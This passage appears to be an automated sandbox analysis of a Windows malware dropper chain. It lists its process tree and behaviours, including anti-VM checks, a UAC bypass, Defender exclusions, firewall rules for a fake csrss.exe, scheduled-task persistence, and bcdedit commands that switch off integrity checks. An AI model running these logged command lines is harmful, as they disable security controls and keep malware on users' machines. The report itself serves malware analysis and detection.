PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 2264 wrote to memory of 3056	2264	swiiiii.exe	36
PID 3056 wrote to memory of 564	3056	RegAsm.exe	37
PID 3056 wrote to memory of 564	3056	RegAsm.exe	37
PID 3056 wrote to memory of 564	3056	RegAsm.exe	37
PID 3056 wrote to memory of 564	3056	RegAsm.exe	37
PID 2264 wrote to memory of 2012	2264	swiiiii.exe	39
PID 2264 wrote to memory of 2012	2264	swiiiii.exe	39
PID 2264 wrote to memory of 2012	2264	swiiiii.exe	39
PID 2264 wrote to memory of 2012	2264	swiiiii.exe	39
PID 2900 wrote to memory of 2280	2900	explorta.exe	38
PID 2900 wrote to memory of 2280	2900	explorta.exe	38
PID 2900 wrote to memory of 2280	2900	explorta.exe	38
PID 2900 wrote to memory of 2280	2900	explorta.exe	38
PID 2280 wrote to memory of 2020	2280	b0dcc639cc.exe	40
PID 2280 wrote to memory of 2020	2280	b0dcc639cc.exe	40
PID 2280 wrote to memory of 2020	2280	b0dcc639cc.exe	40

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\b682c3664db86649adee19d99ff7d141.exe
"C:\Users\Admin\AppData\Local\Temp\b682c3664db86649adee19d99ff7d141.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2344
- C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:2540
- - C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2128
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2264
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3056
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 256
        7⤵
        Program crash
        
        PID:564
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 504
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:2012
    - - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1660
    - - C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2688
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:2600
    - - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
        5⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of SetThreadContext
        System policy modification
        
        PID:2448
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1744
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        6⤵
        
        PID:840
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Drops startup file
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2000
        
        C:\Users\Admin\Pictures\aMRx9WMr2WpXO48F3onpMOLe.exe
        
        "C:\Users\Admin\Pictures\aMRx9WMr2WpXO48F3onpMOLe.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1656
        
        C:\Users\Admin\AppData\Local\Temp\u1a0.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1a0.0.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1868
        
        C:\Users\Admin\AppData\Local\Temp\u1a0.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1a0.1.exe"
        8⤵
        Blocklisted process makes network request
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:3336
        
        C:\Users\Admin\Pictures\kHwixM0W4pufUOuFL9bbFg2C.exe
        
        "C:\Users\Admin\Pictures\kHwixM0W4pufUOuFL9bbFg2C.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3004
        
        C:\Users\Admin\Pictures\kHwixM0W4pufUOuFL9bbFg2C.exe
        
        "C:\Users\Admin\Pictures\kHwixM0W4pufUOuFL9bbFg2C.exe"
        8⤵
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:1232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:4020
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:3576
        
        C:\Users\Admin\Pictures\lnfB347XiMLDThAET8cP8aEn.exe
        
        "C:\Users\Admin\Pictures\lnfB347XiMLDThAET8cP8aEn.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1144
        
        C:\Users\Admin\Pictures\lnfB347XiMLDThAET8cP8aEn.exe
        
        "C:\Users\Admin\Pictures\lnfB347XiMLDThAET8cP8aEn.exe"
        8⤵
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:3796
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3416
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:3124
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        9⤵
        Executes dropped EXE
        
        PID:3212
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:1748
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        10⤵
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
        10⤵
        
        PID:1296
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:1448
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3584
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:1504
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:1052
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:2132
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:1728
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:2740
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:2836
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:688
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:3408
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:2504
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:1260
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        11⤵
        Modifies boot configuration data using bcdedit
        
        PID:1180
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        10⤵
        
        PID:1124
        
        C:\Windows\system32\bcdedit.exe
        
        C:\Windows\Sysnative\bcdedit.exe /v
        10⤵
        Modifies boot configuration data using bcdedit
        
        PID:1656
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        10⤵
        
        PID:3808
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        10⤵
        Creates scheduled task(s)
        
        PID:2152
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        10⤵
        
        PID:1260
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        11⤵
        
        PID:3328
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        12⤵
        Launches sc.exe
        
        PID:3836
        
        C:\Users\Admin\Pictures\20r6ObZueJIz8FampZWGtc4C.exe
        
        "C:\Users\Admin\Pictures\20r6ObZueJIz8FampZWGtc4C.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2452
        
        C:\Users\Admin\Pictures\20r6ObZueJIz8FampZWGtc4C.exe
        
        "C:\Users\Admin\Pictures\20r6ObZueJIz8FampZWGtc4C.exe"
        8⤵
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:3856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3496
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:4072
        
        C:\Users\Admin\Pictures\YXZPFidGwUYbW3HBUdkjxo2P.exe
        
        "C:\Users\Admin\Pictures\YXZPFidGwUYbW3HBUdkjxo2P.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1944
        
        C:\Users\Admin\Pictures\YXZPFidGwUYbW3HBUdkjxo2P.exe
        
        "C:\Users\Admin\Pictures\YXZPFidGwUYbW3HBUdkjxo2P.exe"
        8⤵
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:1656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        9⤵
        
        PID:3400
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        10⤵
        Modifies Windows Firewall
        
        PID:3668
        
        C:\Users\Admin\Pictures\orQUS74tII6F7s1GwG2x83gk.exe
        
        "C:\Users\Admin\Pictures\orQUS74tII6F7s1GwG2x83gk.exe"
        7⤵
        Modifies firewall policy service
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:3804
        
        C:\Users\Admin\Pictures\92C8KgRHR5TJpG1ZOoDEEjmo.exe
        
        "C:\Users\Admin\Pictures\92C8KgRHR5TJpG1ZOoDEEjmo.exe"
        7⤵
        Executes dropped EXE
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\7zSA9D6.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:2476
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:2616
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:3568
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:1748
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:584
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:3760
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:3980
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:3660
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:3832
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:3800
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:4016
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:4008
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:1260
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:3748
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3204
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        13⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        9⤵
        
        PID:3672
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3872
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:3808
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 09:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\gOaInEl.exe\" it /DNHdidvEZD 385118 /S" /V1 /F
        9⤵
        Creates scheduled task(s)
        
        PID:2784
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        9⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        10⤵
        
        PID:3748
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        11⤵
        
        PID:3984
        
        C:\Users\Admin\Pictures\DYqjTL1KN8fbKpS7QFk6BEiG.exe
        
        "C:\Users\Admin\Pictures\DYqjTL1KN8fbKpS7QFk6BEiG.exe"
        7⤵
        
        PID:3420
        
        C:\Users\Admin\AppData\Local\Temp\7zSCB79.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        8⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        10⤵
        
        PID:3208
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        11⤵
        
        PID:1136
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:496
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:2300
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:2460
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:3120
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:2708
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:4004
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:544
        
